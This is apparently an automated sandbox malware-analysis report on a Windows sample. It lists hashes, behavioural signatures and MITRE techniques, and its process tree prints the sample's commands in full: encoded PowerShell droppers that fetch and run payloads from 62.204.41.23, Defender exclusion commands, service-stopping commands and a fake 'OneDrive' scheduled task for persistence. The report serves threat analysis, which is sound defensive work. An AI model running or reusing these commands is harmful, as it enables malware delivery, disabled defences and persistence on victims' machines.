712f4d08ad4db1fb658d8206cee6a00f4024fd4ef5de8de0dfbe0d98779f9f86

Analysis

max time kernel
112s
max time network
135s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
12/05/2023, 15:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

76KB
MD5

1deaa9be17e8122d78a470f44a58300a
SHA1

984147abf4e9f173eb233e0949d76e45dd77ef8a
SHA256

712f4d08ad4db1fb658d8206cee6a00f4024fd4ef5de8de0dfbe0d98779f9f86
SHA512

9a522a03887c38b16d7a34a08f3e9f4aded39066fc852575659b4320f5bb7e51693e7d5ca1715a6d67118fa7340d97309e5bf5869e2aa2ab63b7f0fed4fa10de
SSDEEP

1536:zcr6SNQrsMB3xVyalA9XbLxEC58dHPonAXBbKaAE2UHu90+E:FSNsJ/Vyaald+dQnAXBbKaAE2UH/+E

Score

10^/10

evasion persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/o.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/file.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/r.png

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

description	pid	Process	procid_target
PID 1148 created 1248	1148	OneDrive.exe	14
PID 1148 created 1248	1148	OneDrive.exe	14
PID 1148 created 1248	1148	OneDrive.exe	14
PID 1148 created 1248	1148	OneDrive.exe	14
PID 1148 created 1248	1148	OneDrive.exe	14
PID 1148 created 1248	1148	OneDrive.exe	14
PID 1856 created 1248	1856	OneDrive.exe	14
PID 1856 created 1248	1856	OneDrive.exe	14
PID 1856 created 1248	1856	OneDrive.exe	14
PID 1856 created 1248	1856	OneDrive.exe	14
PID 1856 created 1248	1856	OneDrive.exe	14
PID 1856 created 1248	1856	OneDrive.exe	14

Blocklisted process makes network request 5 IoCs

flow	pid	Process
5	676	powershell.exe
6	776	powershell.exe
7	240	powershell.exe
10	776	powershell.exe
11	776	powershell.exe

Downloads MZ/PE file

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Roaming\\Google\\Libs\\WR64.sys"	services.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	OneDrive.exe

Executes dropped EXE 2 IoCs

pid	Process
1148	OneDrive.exe
1856	OneDrive.exe

Loads dropped DLL 2 IoCs

pid	Process
776	powershell.exe
1944	taskeng.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\OneDrive	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1148 set thread context of 1760	1148	OneDrive.exe	48
PID 1856 set thread context of 1964	1856	OneDrive.exe	72
PID 1856 set thread context of 1260	1856	OneDrive.exe	79

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1756	sc.exe
1976	sc.exe
376	sc.exe
1964	sc.exe
1964	sc.exe
456	sc.exe
1684	sc.exe
884	sc.exe
1056	sc.exe
988	sc.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1548	schtasks.exe
316	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
676	powershell.exe
1760	powershell.exe
240	powershell.exe
776	powershell.exe
776	powershell.exe
776	powershell.exe
1148	OneDrive.exe
1148	OneDrive.exe
808	powershell.exe
1148	OneDrive.exe
1148	OneDrive.exe
1148	OneDrive.exe
1148	OneDrive.exe
1148	OneDrive.exe
1148	OneDrive.exe
1148	OneDrive.exe
1148	OneDrive.exe
1472	powershell.exe
1760	dialer.exe
1760	dialer.exe
1760	dialer.exe
1760	dialer.exe
1148	OneDrive.exe
1148	OneDrive.exe
1856	OneDrive.exe
1856	OneDrive.exe
1172	powershell.exe
1856	OneDrive.exe
1856	OneDrive.exe
1856	OneDrive.exe
1856	OneDrive.exe
1856	OneDrive.exe
1856	OneDrive.exe
1856	OneDrive.exe
1856	OneDrive.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1784	powershell.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1964	dialer.exe
1856	OneDrive.exe
1856	OneDrive.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1248	Explorer.EXE

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	services.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	676	powershell.exe
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeDebugPrivilege	240	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	808	powershell.exe
Token: SeShutdownPrivilege	1204	powercfg.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeShutdownPrivilege	1936	powercfg.exe
Token: SeDebugPrivilege	1760	dialer.exe
Token: SeShutdownPrivilege	872	powercfg.exe
Token: SeShutdownPrivilege	692	powercfg.exe
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeShutdownPrivilege	1868	powercfg.exe
Token: SeShutdownPrivilege	432	powercfg.exe
Token: SeDebugPrivilege	1964	dialer.exe
Token: SeAuditPrivilege	860	svchost.exe
Token: SeShutdownPrivilege	1812	powercfg.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeShutdownPrivilege	1160	powercfg.exe
Token: SeLockMemoryPrivilege	1260	dialer.exe
Token: SeLockMemoryPrivilege	1260	dialer.exe
Token: SeLoadDriverPrivilege	464	services.exe
Token: SeBackupPrivilege	464	services.exe
Token: SeRestorePrivilege	464	services.exe
Token: SeSecurityPrivilege	464	services.exe
Token: SeTakeOwnershipPrivilege	464	services.exe
Token: SeAssignPrimaryTokenPrivilege	860	svchost.exe
Token: SeIncreaseQuotaPrivilege	860	svchost.exe
Token: SeSecurityPrivilege	860	svchost.exe
Token: SeTakeOwnershipPrivilege	860	svchost.exe
Token: SeLoadDriverPrivilege	860	svchost.exe
Token: SeSystemtimePrivilege	860	svchost.exe
Token: SeBackupPrivilege	860	svchost.exe
Token: SeRestorePrivilege	860	svchost.exe
Token: SeShutdownPrivilege	860	svchost.exe
Token: SeSystemEnvironmentPrivilege	860	svchost.exe
Token: SeUndockPrivilege	860	svchost.exe
Token: SeManageVolumePrivilege	860	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	860	svchost.exe
Token: SeIncreaseQuotaPrivilege	860	svchost.exe
Token: SeSecurityPrivilege	860	svchost.exe
Token: SeTakeOwnershipPrivilege	860	svchost.exe
Token: SeLoadDriverPrivilege	860	svchost.exe
Token: SeSystemtimePrivilege	860	svchost.exe
Token: SeBackupPrivilege	860	svchost.exe
Token: SeRestorePrivilege	860	svchost.exe
Token: SeShutdownPrivilege	860	svchost.exe
Token: SeSystemEnvironmentPrivilege	860	svchost.exe
Token: SeUndockPrivilege	860	svchost.exe
Token: SeManageVolumePrivilege	860	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	860	svchost.exe
Token: SeIncreaseQuotaPrivilege	860	svchost.exe
Token: SeSecurityPrivilege	860	svchost.exe
Token: SeTakeOwnershipPrivilege	860	svchost.exe
Token: SeLoadDriverPrivilege	860	svchost.exe
Token: SeSystemtimePrivilege	860	svchost.exe
Token: SeBackupPrivilege	860	svchost.exe
Token: SeRestorePrivilege	860	svchost.exe
Token: SeShutdownPrivilege	860	svchost.exe
Token: SeSystemEnvironmentPrivilege	860	svchost.exe
Token: SeUndockPrivilege	860	svchost.exe
Token: SeManageVolumePrivilege	860	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	860	svchost.exe
Token: SeIncreaseQuotaPrivilege	860	svchost.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe

Suspicious use of SendNotifyMessage 21 IoCs

pid	Process
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe
1260	dialer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1096 wrote to memory of 1760	1096	file.exe	28
PID 1096 wrote to memory of 1760	1096	file.exe	28
PID 1096 wrote to memory of 1760	1096	file.exe	28
PID 1096 wrote to memory of 240	1096	file.exe	30
PID 1096 wrote to memory of 240	1096	file.exe	30
PID 1096 wrote to memory of 240	1096	file.exe	30
PID 1096 wrote to memory of 776	1096	file.exe	32
PID 1096 wrote to memory of 776	1096	file.exe	32
PID 1096 wrote to memory of 776	1096	file.exe	32
PID 1096 wrote to memory of 676	1096	file.exe	33
PID 1096 wrote to memory of 676	1096	file.exe	33
PID 1096 wrote to memory of 676	1096	file.exe	33
PID 776 wrote to memory of 1148	776	powershell.exe	36
PID 776 wrote to memory of 1148	776	powershell.exe	36
PID 776 wrote to memory of 1148	776	powershell.exe	36
PID 1868 wrote to memory of 1056	1868	cmd.exe	41
PID 1868 wrote to memory of 1056	1868	cmd.exe	41
PID 1868 wrote to memory of 1056	1868	cmd.exe	41
PID 1868 wrote to memory of 1976	1868	cmd.exe	42
PID 1868 wrote to memory of 1976	1868	cmd.exe	42
PID 1868 wrote to memory of 1976	1868	cmd.exe	42
PID 1868 wrote to memory of 988	1868	cmd.exe	43
PID 1868 wrote to memory of 988	1868	cmd.exe	43
PID 1868 wrote to memory of 988	1868	cmd.exe	43
PID 1868 wrote to memory of 1964	1868	cmd.exe	44
PID 1868 wrote to memory of 1964	1868	cmd.exe	44
PID 1868 wrote to memory of 1964	1868	cmd.exe	44
PID 1868 wrote to memory of 376	1868	cmd.exe	45
PID 1868 wrote to memory of 376	1868	cmd.exe	45
PID 1868 wrote to memory of 376	1868	cmd.exe	45
PID 1148 wrote to memory of 1760	1148	OneDrive.exe	48
PID 1980 wrote to memory of 1204	1980	cmd.exe	51
PID 1980 wrote to memory of 1204	1980	cmd.exe	51
PID 1980 wrote to memory of 1204	1980	cmd.exe	51
PID 1980 wrote to memory of 1936	1980	cmd.exe	52
PID 1980 wrote to memory of 1936	1980	cmd.exe	52
PID 1980 wrote to memory of 1936	1980	cmd.exe	52
PID 1472 wrote to memory of 1548	1472	powershell.exe	53
PID 1472 wrote to memory of 1548	1472	powershell.exe	53
PID 1472 wrote to memory of 1548	1472	powershell.exe	53
PID 1980 wrote to memory of 872	1980	cmd.exe	54
PID 1980 wrote to memory of 872	1980	cmd.exe	54
PID 1980 wrote to memory of 872	1980	cmd.exe	54
PID 1760 wrote to memory of 420	1760	dialer.exe	3
PID 1760 wrote to memory of 464	1760	dialer.exe	2
PID 1760 wrote to memory of 480	1760	dialer.exe	1
PID 1760 wrote to memory of 488	1760	dialer.exe	6
PID 1980 wrote to memory of 692	1980	cmd.exe	55
PID 1980 wrote to memory of 692	1980	cmd.exe	55
PID 1980 wrote to memory of 692	1980	cmd.exe	55
PID 1944 wrote to memory of 1856	1944	taskeng.exe	59
PID 1944 wrote to memory of 1856	1944	taskeng.exe	59
PID 1944 wrote to memory of 1856	1944	taskeng.exe	59
PID 1680 wrote to memory of 1964	1680	cmd.exe	64
PID 1680 wrote to memory of 1964	1680	cmd.exe	64
PID 1680 wrote to memory of 1964	1680	cmd.exe	64
PID 1680 wrote to memory of 456	1680	cmd.exe	65
PID 1680 wrote to memory of 456	1680	cmd.exe	65
PID 1680 wrote to memory of 456	1680	cmd.exe	65
PID 1680 wrote to memory of 1756	1680	cmd.exe	66
PID 1680 wrote to memory of 1756	1680	cmd.exe	66
PID 1680 wrote to memory of 1756	1680	cmd.exe	66
PID 1680 wrote to memory of 1684	1680	cmd.exe	67
PID 1680 wrote to memory of 1684	1680	cmd.exe	67

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:464
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:968
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2016
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:1100
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1116
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1040
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:484
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:284
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:860
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {33506574-CF87-425E-9B2F-101BB9F34570} S-1-5-21-2647223082-2067913677-935928954-1000:BPOQNXYB\Admin:Interactive:[1]
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1944
  - - C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
      C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Checks BIOS information in registry
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:1856
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:816
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:764
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:680
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:604
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    - Checks processor information in registry
    PID:2020

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1540

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1248
- C:\Users\Admin\AppData\Local\Temp\file.exe
  "C:\Users\Admin\AppData\Local\Temp\file.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:240
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:776
  - - C:\Users\Admin\AppData\Roaming\OneDrive.exe
      "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Checks BIOS information in registry
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:808
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1868
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1056
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1976
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:988
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1964
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:376
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1980
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1204
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1936
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:872
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:692
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huakaggax#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1472
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
    3⤵
    - Creates scheduled task(s)
    PID:1548
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "OneDrive"
  2⤵
  PID:1284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1172
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1964
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:456
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1756
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1684
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:884
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1416
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1868
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:432
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1812
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1160
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huakaggax#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1784
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
    3⤵
    - Creates scheduled task(s)
    PID:316
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1260

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

